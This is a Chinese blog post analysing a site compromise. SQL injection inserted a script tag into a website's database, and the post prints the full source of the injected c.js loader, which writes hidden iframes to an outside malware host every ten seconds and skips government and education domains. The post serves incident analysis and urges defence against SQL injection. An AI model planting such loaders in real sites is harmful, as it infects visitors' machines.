朋友一网站,只要一打开网页,就被 rising 提示:
访问地址:http://l3ie445b.cn/a/a44.htm
访问网页的进程:"C:/Program Files/Maxthon2/Maxthon.exe"
漏洞对象名:scripting.filesystemobject
很明显,网页被挂马了。
查看页面代码,页面中增加了一部分内容:
<a href="admin_groupedit.aspx?id=1">栏目管理员<script src=http://3b3.org/c.js></script></a>
看到上面的链接中,增加了<script src=http://3b3.org/c.js></script>这部分内容,从它的挂马网站上下载了c.js,源码如下:
var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://ccndk822.cn/a/a100.htm width=0 height=0></iframe>");
function rl()
{
var msgObj = document.createElement("div");
msgObj.setAttribute("id","msgDiv");
document.body.appendChild(msgObj);
var obj = document.getElementById("msgDiv");
obj.innerHTML ="<iframe src=http://ccndk822.cn/a/a100.htm width=0 height=0></iframe>";
}
setInterval("rl()",10000);
}
document.writeln("<script type=/"text//javascript/" src=/"http:js.tongji.linezing.com//1136402//tongji.js/"><//script>");
上面的意思一看就明白了他要干什么。
现在有个问题,那就是 <script src=http://3b3.org/c.js></script> 是如何被加到页面里的呢?
查看数据库,就全明白了,原来的“栏目管理员"变成了“栏目管理员<script src=http://3b3.org/c.js></script>”,这个挂马的也太过份了,不但改了数据库中的内容,同时,将好多的表的记录全部删除了。可恶!!!最后,整个网站的数据差不多全删除了。
他是如何将数据写到数据库中的呢?初步估计可能是采用SQL注入方法。检查源代码,网站对输入的内容全信任,没有做任何检查,就提交到数据库。这部分的东西网上现在有很多,可以看一下,防止SQL注入攻击。